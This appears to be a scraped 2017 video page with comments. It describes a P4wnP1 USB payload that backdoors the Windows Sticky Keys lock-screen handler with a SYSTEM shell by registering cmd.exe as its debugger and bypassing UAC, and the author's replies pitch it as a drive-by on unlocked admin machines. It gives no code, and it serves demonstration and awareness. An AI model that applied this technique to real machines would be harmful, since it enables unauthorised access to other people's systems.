Backdoor Windows lockscreen with P4wnP1

  • Published on Aug 30, 2017
  • This is a demo of an unreleased payload.
    It backdoors the Lockscreen "Sticky Keys" of Windows 7 / Windows 10 with a cmd.exe shell ran by SYSTEM user.
    Don't work with privileged accounts if not needed !
    Lock your machine when unused !
    The payload teaches:
    - how to uses KEYBOARD triggers to branch into different payload sections (NUMLOCK = backdoor install, SCROLLLOCK = backdoor removal)
    - how to bypass UAC
    Project page:
  • Science & TechnologyScience & Technology

Comments • 21

  • Shawn Briere
    Shawn Briere 7 months ago

    Testing this on a fully patched Windows 10 machine, this appears to no longer work because Windows Defender is blocking it. I still love this device though, many great features...especially for pranks.

  • Aleksei Buivol
    Aleksei Buivol 8 months ago

    In new Windows this method don't work

  • Gazza-in-the-usa
    Gazza-in-the-usa 8 months ago

    Got to say this is pretty crap if you are trying to un-password an old PC.

  • cam 5
    cam 5 9 months ago

    So this payload copys cmd.exe, renames the sticky keys program and calls the copy of cmd.exe what ever the sticky keys program is. Can't this payload be stopped by disabling shift times for sticky keys in control panol.

    • TheMaMe82
      TheMaMe82  9 months ago

      It loads cmd.exe as debugger target, so nothing is copied around. Not sure on the proposed mitigation, but utilman.exe still is there

  • Ahmad Abo aljod Barsa

    Isnt it just renaming some exe with cmd.exe , so when you press five times shift it will be the renamed cmd.exe ? I've made once something like that with ms dos

    • TheMaMe82
      TheMaMe82  Year ago +1

      The binaries you're referring are `utilman` or `sethc`.
      Yes that's the basic idea, but instead of replacing them, cmd.exe is preloaded as debugger . No binary changing, no reboot.
      Anyway, the techniques are old and well understood. This PoC is to highlight how fast it could be done (and reverted) if one automates this process and runs it on unlocked admin workstations in drive-by fashion.

  • CalabreseMPC
    CalabreseMPC Year ago +5

    first step: login with admin.

    • TheMaMe82
      TheMaMe82  Year ago +1

      CalabreseMPC The real world scenario this would be a fast drive-by for an unlocked box with privileged user logged in.
      Of course it wouldn't be a problem to get systrm privs on a Windows Box with physical access, but it takes some time.
      So again, this PoC is about fast drive-by on an unlocked box (time constraint).
      Should have been more clear on this.

  • Emanuel Lang
    Emanuel Lang 2 years ago

    Hey, ich hab ne Frage.... Wenn ich den raspberry an meinen eigenen Computer anschliesse. Wie mach ich dann das, dass er nicht auch meinen Computer "hackt" sondern ich auf den p4wnp1 zugreifen kann und die Daten ablesen kann?

  • vikas gajjar
    vikas gajjar 2 years ago

    Waiting for it

  • ▐ ᴇʟᴍᴏᴅᴏ7▐

    Cool one, gj!

  • vrkiller 22
    vrkiller 22 2 years ago

    Themame82 please make payloads for Android

  • TheMaMe82
    TheMaMe82  2 years ago

    The payload is included in the repo, meanwhile.

  • Julio Ramos
    Julio Ramos 2 years ago


    • TheMaMe82
      TheMaMe82  2 years ago

      HalfCupOfWater shoud better have targeted utilman.exe, I guess;-)

    • ▐ ᴇʟᴍᴏᴅᴏ7▐
      ▐ ᴇʟᴍᴏᴅᴏ7▐ 2 years ago

      oh fuck hahah
      that's a weird sense of humor! =D

    • HalfCupOfWater
      HalfCupOfWater 2 years ago +1

      I was pretending that the point of the hack was what was being replaced instead of what it was being replaced with. Some kind of comical misunderstanding. Sorry, it wasn't very funny. Also forgot an 'it'.

    • TheMaMe82
      TheMaMe82  2 years ago


    • HalfCupOfWater
      HalfCupOfWater 2 years ago

      Because the disabled have had too good for too long.